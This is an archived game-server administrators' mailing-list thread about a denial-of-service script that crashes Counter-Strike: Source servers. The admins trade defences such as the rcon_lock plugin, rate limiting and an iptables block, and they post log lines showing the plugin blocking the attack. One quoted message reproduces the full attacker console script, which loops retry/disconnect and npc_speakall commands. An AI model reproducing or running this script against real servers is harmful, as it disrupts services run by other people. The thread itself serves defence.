Somebody actually just tried this on my server in the last 10 minutes, and rcon lock definitely blocked it:
L 08/23/2009 - 04:21:59: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
[... identical 04:22:00 entries repeated many more times ...]

I tried it on my own test server after as well, and "rcon lock" blocked it there as well.

On Sun, Aug 23, 2009 at 4:18 AM, Kyle Sanderson <[email protected]> wrote:
> Sorry for the double mail,
> Here is a YouTube video that I found showing off this exploit.
> http://www.youtube.com/watch?v=8ScKSfsd3TU
>
> Kyle.
>
> On Sun, Aug 23, 2009 at 3:46 AM, Kyle Sanderson <[email protected]> wrote:
>
> > I have Rcon Lock installed, this attack still works as it's not calling any
> > commands rather than just calling retry in 0.01 second intervals. I was just
> > thinking about a plugin/script that would ban someone's IP for 5 minutes
> > after a person connects 2 times in 5 seconds?
> >
> > I don't know if that's even possible,
> > Kyle.
> >
> >
> > On Sun, Aug 23, 2009 at 2:18 AM, P. Bhandal <[email protected]> wrote:
> >
> >> I'm not at home, so I can't test it right now, but I believe DeviceNull's
> >> rcon lock plugin blocks clients from sending commands before they are fully
> >> connected. You can find more details on it here:
> >>
> >> http://forums.alliedmods.net/showthread.php?p=841590
> >>
> >> On Sun, Aug 23, 2009 at 2:01 AM, Kyle Sanderson <[email protected]> wrote:
> >>
> >> > Not sure how many of you have encountered this script. But it has been
> >> > taking my server down quite a bit lately. Just found the kid on FPSB posting
> >> > his script up so here we are.
> >> >
> >> > Hey guys im releasing my Green Null Name Exploit
> >> > (BTW SAVE THIS AS A text file)
> >> >
> >> >
> >> > 1) now u have a .txt file u make a folder in ur c strike called testscripts
> >> > 2) open the .txt and edit it to make anything you want the symbols in there
> >> > between letters make the color of your name change so keep those in there
> >> > 3) put the script in your testscripts folder
> >> > 4) open counter strike and now join a server and put this in console
> >> > Test_StartScript crash.txt
> >> > only leave it as crash.txt if u dont change the name of your file.
> >> >
> >> > Setinfo name " CaM FuCkEd Up ThE SeRvEr... "
> >> > retry
> >> > Test_Wait .75
> >> > disconnect
> >> > Test_Wait .2
> >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... "
> >> > Test_Wait .1
> >> > retry
> >> > Test_Wait .75
> >> > disconnect
> >> > Test_Wait .2
> >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... "
> >> > Test_Wait .1
> >> > retry
> >> > Test_Wait .75
> >> > disconnect
> >> > Test_Wait .1
> >> > setinfo name " C a m W i n s "
> >> >
> >> > Test_StartLoop spamcrash
> >> > retry
> >> > Test_Wait 0.01
> >> > disconnect
> >> > Test_Wait 0.01
> >> > Test_LoopForNumSeconds spamcrash 1
> >> >
> >> > Test_Wait .1
> >> > retry;
> >> >
> >> > Test_StartLoop crash
> >> > npc_speakall
> >> > Test_Wait 0.01
> >> > Test_LoopForNumSeconds crash 2
> >> > disconnect;
> >> >
> >> >
> >> > http://www.fpsbanana.com/scripts/5196
> >> >
> >> > Anyways, hope this helps some of you and maybe a script/patch can be made
> >> > via sourcemod. I've already blocked the string npc_speakall via iptables but
> >> > that had no effect (Not even sure if that calls any functions on the
> >> > server.) I'm running CentOS 32bit and a bunch of CS:S servers.
> >> > Kyle.
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please visit:
http://list.valvesoftware.com/mailman/listinfo/hlds

